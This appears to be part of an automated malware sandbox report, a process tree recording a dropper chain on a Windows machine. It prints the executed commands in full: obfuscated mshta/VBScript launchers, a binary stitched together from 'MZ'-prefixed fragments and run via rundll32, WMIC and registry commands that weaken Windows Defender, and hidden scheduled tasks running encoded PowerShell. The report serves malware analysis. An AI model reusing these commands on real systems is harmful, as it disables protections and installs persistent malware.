                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 240
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:7272
                                                                                                                                                                          • C:\Users\Admin\Documents\WXhP7Lj7noVP0ru01p2gZwdG.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\WXhP7Lj7noVP0ru01p2gZwdG.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            PID:5368
                                                                                                                                                                            • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5944
                                                                                                                                                                                • C:\Users\Admin\Documents\63GomkqnXl4IWFjZRSn9geJ5.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\63GomkqnXl4IWFjZRSn9geJ5.exe"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:7288
                                                                                                                                                                                  • C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:7408
                                                                                                                                                                                    • C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:1528
                                                                                                                                                                                    • C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:7348
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:6572
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe" ) do taskkill /f -Im "%~nXw"
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:2940
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE
                                                                                                                                                                                                  ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:8472
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:8408
                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                            PID:3408
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill /f -Im "xBuRtBDpUgKPEpv6Qbm_x2j9.exe"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:8780
                                                                                                                                                                                                  • C:\Users\Admin\Documents\NRd34BHQASvHQ4Mko5Ateaw4.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\NRd34BHQASvHQ4Mko5Ateaw4.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:7496
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe"
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:4376
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:9024
                                                                                                                                                                                                      • C:\Users\Admin\Documents\7DrghgbkgI2jLUHFNgq_bxXK.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\7DrghgbkgI2jLUHFNgq_bxXK.exe"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:7676
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 236
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:5528
                                                                                                                                                                                                        • C:\Users\Admin\Documents\eInAfAAnadxOn3g6O89Cb5FT.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\eInAfAAnadxOn3g6O89Cb5FT.exe"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:7632
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 1736
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              PID:5656
                                                                                                                                                                                                          • C:\Users\Admin\Documents\SgfJUJN11IroPHvivngzyLg1.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\SgfJUJN11IroPHvivngzyLg1.exe" /mixtwo
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:3848
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 236
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:7432
                                                                                                                                                                                                            • C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:5392
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:4384
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe" ) do taskkill -F -Im "%~nXU"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:7500
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                                                                                                                                                                                                                          SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:3928
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                PID:8764
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                    PID:8788
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                    PID:7852
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:8860
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:1488
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          PID:9044
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                          control .\FUEj5.QM
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:2292
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              PID:9168
                                                                                                                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                  PID:15160
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:15208
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill -F -Im "1n_ss7XlOu1cTBk10KK6KyVd.exe"
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:8568
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\FqXp9izM6tdgKrP4sV7pt7YU.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\FqXp9izM6tdgKrP4sV7pt7YU.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:8060
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSA464.tmp\Install.exe
                                                                                                                                                                                                                                      .\Install.exe
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:5964
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC0C5.tmp\Install.exe
                                                                                                                                                                                                                                          .\Install.exe /S /site_id "668658"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          PID:4900
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                              PID:9072
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                  PID:9204
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                      PID:7348
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                          PID:1624
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                              PID:6732
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                            PID:3996
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                PID:2252
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                    PID:13784
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:15284
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:4228
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                        PID:3156
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                            PID:9940
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                        PID:10876
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                            PID:10928
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                PID:11236
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                    PID:12708
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                              PID:2000
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                PID:9128
                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                    PID:9132
                                                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                      PID:1888
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                    PID:2132
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                        PID:8224
                                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:2648
                                                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                              PID:4856
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "gXHlxiYIv" /SC once /ST 01:25:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                          PID:6516
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 11:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\SNRcYjF.exe\" uG /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                          PID:5092
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\XvFe4GzJul_YZ2OFsGeMoF0i.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\XvFe4GzJul_YZ2OFsGeMoF0i.exe" silent
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                    PID:1432
